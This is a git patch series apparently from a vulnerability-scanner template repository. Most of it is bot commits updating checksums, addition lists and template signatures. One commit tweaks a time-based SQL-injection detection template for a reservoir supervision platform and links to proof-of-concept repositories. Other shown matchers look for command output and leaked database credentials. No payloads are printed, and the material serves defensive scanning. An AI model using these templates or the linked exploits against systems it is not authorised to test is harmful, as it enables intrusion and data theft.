-http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:48a2dfbd0468c709aab34180039627de6a59c4fc +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:3276dbb5e99b1dc3a5c0d40ad993be6815ace739 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:5a11aa25b3472c2ab8c6518d5941a86837b53c6f +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:ac8a026cda35d0d4d78c2dc7b2815e5becd1284e +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:9d9e1217003abdc21365b9351c23a983d4602705 +http/technologies/wordpress/plugins/woocommerce-services.yaml:fff278ffac815bb8c009c2d7c1121270ffbb65b8 +http/technologies/wordpress/plugins/woocommerce.yaml:f0381d3af7f9200dd4e85a0b279e3261b2cb84c5 +http/technologies/wordpress/plugins/wordfence.yaml:2f60a9ffd6daa8c3958e5d63ca8486b804ed2427 +http/technologies/wordpress/plugins/wordpress-importer.yaml:02b01d10ea43ea44c3ad6376e06d65c2b38a0bc1 +http/technologies/wordpress/plugins/wordpress-seo.yaml:b11fd85c7f0f36a67a54868fe7fe68b6c71e3695 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:dd6b0df8ae4e459b81bf47cf1087138f8b662344 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ced04026f2fe44d9b2567a5ec5f5fa882e3ba3ae +http/technologies/wordpress/plugins/wp-file-manager.yaml:b3d4b240b0990c6c23db625c10645c3104932c8c +http/technologies/wordpress/plugins/wp-google-maps.yaml:dda40c6e76e56f4b136da09ee74c7302b4fb7fc4 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f4873b9b95df09c0a73d39588b64e24cc43aa321 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:64dd98d57010c809599e50767b29fc2c4608dcde +http/technologies/wordpress/plugins/wp-migrate-db.yaml:a55bbfb124b5d70262230053ec16e06ec5d746c2 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:9c775cba0d2d668b35b3aec7d4d5a805407f1ca7 +http/technologies/wordpress/plugins/wp-optimize.yaml:258735479f7bc255949ce2e339232e25bb8b8b66 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:f9e45464e77dc8d067757cb8383d1be75648b1e8 +http/technologies/wordpress/plugins/wp-reset.yaml:64d33fd1ea4833aa90afe954f84849c811857759 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0852d8fec3e412fa1bf18019dcf967b2154859a1 +http/technologies/wordpress/plugins/wp-rollback.yaml:3a75d3303ff7998108e75ac352aaab6a51b67d1d +http/technologies/wordpress/plugins/wp-seopress.yaml:5e6640b4d577e3d43827e0cbc20011c4725b6bf6 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:7d6e53e8b59438726618ff0a6e778ea0e07bfe03 +http/technologies/wordpress/plugins/wp-smushit.yaml:e8b60d00252cc12a062b205acc016cb0f1a2e581 +http/technologies/wordpress/plugins/wp-statistics.yaml:1d534a900ff9d617762f6fb60654e85067ae0ccd +http/technologies/wordpress/plugins/wp-super-cache.yaml:0bd088bf00c6984f950af950a047f3bd5d3315b7 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e46903d5d3fb1bce6a67028aba50689a29d15742 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:80dfc74700cd02c1020f981cf25158009db8a478 +http/technologies/wordpress/plugins/wpforms-lite.yaml:4e33526f7ebd217fd677c760f99acaa61a2c2ef4 +http/technologies/wordpress/plugins/wps-hide-login.yaml:b5cd4fdc5d01fdf3007584ac6d924eea9444e629 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c542d9d2ef2ca3ec90f2d9816ea35d690c1e2735 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:f5eff7bd3cc8b3c5e361b1acef280d0a0e88d9ca http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8848,7 +8850,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e4da9df4127f0af0572f6a9d1f225965fc25a50a +templates-checksum.txt:9d41eebf37c0e0ae8872ba4008038c2e8a1d02fe wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8aeb5dc932eb91cd1693b93284cd6e87c6f3e2a4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:55:38 +0000 Subject: [PATCH 1003/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f12ff694a3..6b9a451d33 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-47117.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' + - 'http/cves/2024/CVE-2024-25852.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' - 'http/cves/2024/CVE-2024-29972.yaml' - 'http/cves/2024/CVE-2024-32709.yaml' From 625adf7c7a39654fe99dbef464a158234a847381 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:56:43 +0000 Subject: [PATCH 1004/1841] Auto Template Signing [Tue Jul 9 08:56:43 UTC 2024] :robot: --- http/cves/2024/CVE-2024-25852.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-25852.yaml b/http/cves/2024/CVE-2024-25852.yaml index 69640bcdac..de9a3818da 100644 --- a/http/cves/2024/CVE-2024-25852.yaml +++ b/http/cves/2024/CVE-2024-25852.yaml @@ -44,3 +44,4 @@ http: - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and +# digest: 490a0046304402202153b2db486cc766305d138e6eb3ee33f978bf43e3575d91cef771e7c0124c3102203c2180ccbd5399845dda7b300524f79435b3bef94e700d511e27e22f1abd9848:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4805b900d59660041938b3963be2e86ac81f0889 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:58:45 +0000 Subject: [PATCH 1005/1841] Auto Generated New Template Addition List [Tue Jul 9 08:58:45 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a41f24605a..f248cb655a 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/cves/2024/CVE-2024-33610.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-36401.yaml http/cves/2024/CVE-2024-36991.yaml +http/cves/2024/CVE-2024-37032.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-4434.yaml From 8c444fa05c607e5f993af73bea8902ed750784a3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:58:55 +0000 Subject: [PATCH 1006/1841] Auto Generated Templates Checksum [Tue Jul 9 08:58:55 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 794c922543..054992711e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3416,7 +3416,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 -http/cves/2024/CVE-2024-25852.yaml:d678743a8ce9a63d15bdcb3b4a9cbcfd19e71621 +http/cves/2024/CVE-2024-25852.yaml:6e69cac17440172ed48c80463db85250167bb9c8 http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f @@ -3472,6 +3472,7 @@ http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-36991.yaml:871d08f99d501e2b11dcdb2329dc31bdc6c50cf6 +http/cves/2024/CVE-2024-37032.yaml:ed43c0790b67166998e9e1e509eeae9c37b72f79 http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb @@ -8850,7 +8851,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9d41eebf37c0e0ae8872ba4008038c2e8a1d02fe +templates-checksum.txt:8dca2a85063ef4a01d67a9e3c318561f378c22d2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 587e303e10a93b1600948be280681c667d57fab4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:59:33 +0000 Subject: [PATCH 1007/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6b9a451d33..ab1b416d10 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-36401.yaml' - 'http/cves/2024/CVE-2024-36991.yaml' + - 'http/cves/2024/CVE-2024-37032.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-4434.yaml' From 352dba675ddbeb862dfe3e529fe49d0278269299 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:59:49 +0000 Subject: [PATCH 1008/1841] Auto Generated New Template Addition List [Tue Jul 9 08:59:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f248cb655a..4965c339e0 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ dast/cves/2022/spring4shell-CVE-2022-22965.yaml dast/vulnerabilities/injection/csv-injection.yaml dast/vulnerabilities/injection/xinclude-injection.yaml +http/cnvd/2024/CNVD-2021-64035.yaml http/cves/2020/CVE-2020-10189.yaml http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-35156.yaml From b8aabc8ccd1693d0e221ac6bebaecc1acc9567a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:59:58 +0000 Subject: [PATCH 1009/1841] Auto Generated Templates Checksum [Tue Jul 9 08:59:58 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 054992711e..55d6fa646b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -992,6 +992,7 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 +http/cnvd/2024/CNVD-2021-64035.yaml:72e13892259adbdb784717e77980d864e6370801 http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 @@ -8851,7 +8852,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8dca2a85063ef4a01d67a9e3c318561f378c22d2 +templates-checksum.txt:a66233a4a9281c211b9e876ef9c9aeba5ec9fd48 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3900cce6157192299d8cda22d51c5d73bc6c8fbc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 09:00:36 +0000 Subject: [PATCH 1010/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ab1b416d10..3a004fb3f1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'dast/cves/2022/spring4shell-CVE-2022-22965.yaml' - 'dast/vulnerabilities/injection/csv-injection.yaml' - 'dast/vulnerabilities/injection/xinclude-injection.yaml' + - 'http/cnvd/2024/CNVD-2021-64035.yaml' - 'http/cves/2020/CVE-2020-10189.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-35156.yaml' From fb3c4f018f6c05dbda078459831704a6151c74cc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 09:00:38 +0000 Subject: [PATCH 1011/1841] Auto Template Signing [Tue Jul 9 09:00:38 UTC 2024] :robot: --- http/cves/2024/CVE-2024-37032.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-37032.yaml b/http/cves/2024/CVE-2024-37032.yaml index 62e5675801..a162eaa8b8 100644 --- a/http/cves/2024/CVE-2024-37032.yaml +++ b/http/cves/2024/CVE-2024-37032.yaml @@ -38,3 +38,4 @@ http: - contains(interactsh_protocol, 'http') - contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest') condition: and +# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9a97f3b8ecec17bd1e7c1dfbef70fe7acb224f39 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 09:26:13 +0000 Subject: [PATCH 1012/1841] Auto Generated New Template Addition List [Tue Jul 9 09:26:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4965c339e0..5c64ad48f2 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/cves/2024/CVE-2024-37032.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-4434.yaml +http/cves/2024/CVE-2024-4836.yaml http/cves/2024/CVE-2024-5522.yaml http/cves/2024/CVE-2024-5947.yaml http/cves/2024/CVE-2024-6028.yaml From 2ab9beb0b0093332a65b76c0d0b0a1a6038811a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 09:26:20 +0000 Subject: [PATCH 1013/1841] Auto Generated Templates Checksum [Tue Jul 9 09:26:20 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 55d6fa646b..4bbb960776 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3473,7 +3473,7 @@ http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-36991.yaml:871d08f99d501e2b11dcdb2329dc31bdc6c50cf6 -http/cves/2024/CVE-2024-37032.yaml:ed43c0790b67166998e9e1e509eeae9c37b72f79 +http/cves/2024/CVE-2024-37032.yaml:098e78c2cfc97aee7b9e22ff34101e609f023cc2 http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb @@ -3485,6 +3485,7 @@ http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b +http/cves/2024/CVE-2024-4836.yaml:13484506cd2984ec71aa622e5987b30e30f9efc9 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a @@ -8852,7 +8853,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a66233a4a9281c211b9e876ef9c9aeba5ec9fd48 +templates-checksum.txt:dc7065a5e6462f090625c4babda8ce05ae4ce9f3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2ebc0ba2ae7df8b7b5522f8a8b868139b8c7c14a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 09:26:59 +0000 Subject: [PATCH 1014/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3a004fb3f1..81aa5f9eda 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-4434.yaml' + - 'http/cves/2024/CVE-2024-4836.yaml' - 'http/cves/2024/CVE-2024-5522.yaml' - 'http/cves/2024/CVE-2024-5947.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' From 150e8ddc8a27f0f25c245a848480c881a4d857ff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 09:28:05 +0000 Subject: [PATCH 1015/1841] Auto Template Signing [Tue Jul 9 09:28:05 UTC 2024] :robot: --- http/cnvd/2024/CNVD-2021-64035.yaml | 1 + http/cves/2024/CVE-2024-4836.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cnvd/2024/CNVD-2021-64035.yaml b/http/cnvd/2024/CNVD-2021-64035.yaml index 2f97ea6bd3..01aae7b786 100644 --- a/http/cnvd/2024/CNVD-2021-64035.yaml +++ b/http/cnvd/2024/CNVD-2021-64035.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a116aefbd81adb68a0b53bf166cbe04f64b398ec87ac359d0dad01ad68beccc3022100b0564611ca028726a04d132f781f9347cdede59a636b07f5e8e9d13aae1c2d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4836.yaml b/http/cves/2024/CVE-2024-4836.yaml index c1dfb0a899..c2dba85f32 100644 --- a/http/cves/2024/CVE-2024-4836.yaml +++ b/http/cves/2024/CVE-2024-4836.yaml @@ -43,3 +43,4 @@ http: - 'contains_all(body,"db_password", "db_username")' - 'status_code==200' condition: and +# digest: 4b0a00483046022100b7a10b83a25f29c5859758a83f69247591dea7ed398df4fde6d1e13bc1b6b902022100ad967c69511089521f1cf12acb05e192a2852346c6cc9b7cb96fe6f8cea4aa02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cdd6abec83e2d7457562eec390a8a4db358bc3d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 15:49:53 +0530 Subject: [PATCH 1016/1841] minor update --- http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml index f69a00a4cd..f17d0dfe2c 100644 --- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml +++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml @@ -5,11 +5,12 @@ info: author: securityforeveryone severity: critical description: | - There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage. + There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information. reference: - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + - https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go metadata: - verified: true + verified: "true" max-request: 1 fofa-query: "js/PSExtend.js" tags: sqli,pingsheng @@ -28,6 +29,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"Result","false","Message","?xml version")' + - 'contains_all(body,"Result","false","Message")' + - 'contains(content_type,"text/xml")' - 'status_code == 200' condition: and From d5ad8ecd14f5e1d47dd02f113d1c0107713f154b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 15:54:07 +0530 Subject: [PATCH 1017/1841] update severity --- http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml index f17d0dfe2c..0b14c45d62 100644 --- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml +++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml @@ -3,7 +3,7 @@ id: pingsheng-electronic-sqli info: name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection author: securityforeveryone - severity: critical + severity: high description: | There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information. reference: From 2b6b00eba59070fa3d347efeb78d01f689082b46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 16:04:16 +0530 Subject: [PATCH 1018/1841] Update and rename hjsoft-hcm-tb-sqli.yaml to hjsoft-hcm-tb-sqli.yaml --- .../{other => hjsoft}/hjsoft-hcm-tb-sqli.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename http/vulnerabilities/{other => hjsoft}/hjsoft-hcm-tb-sqli.yaml (86%) diff --git a/http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml similarity index 86% rename from http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml rename to http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml index fa50dd89ee..b84234a3a0 100644 --- a/http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml 